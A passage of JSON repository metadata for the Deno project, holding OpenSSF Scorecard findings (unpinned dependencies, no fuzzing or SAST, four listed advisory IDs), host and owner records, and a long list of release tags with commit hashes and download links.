https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36685524,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-15T02:00:05.847Z","response_time":94,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind"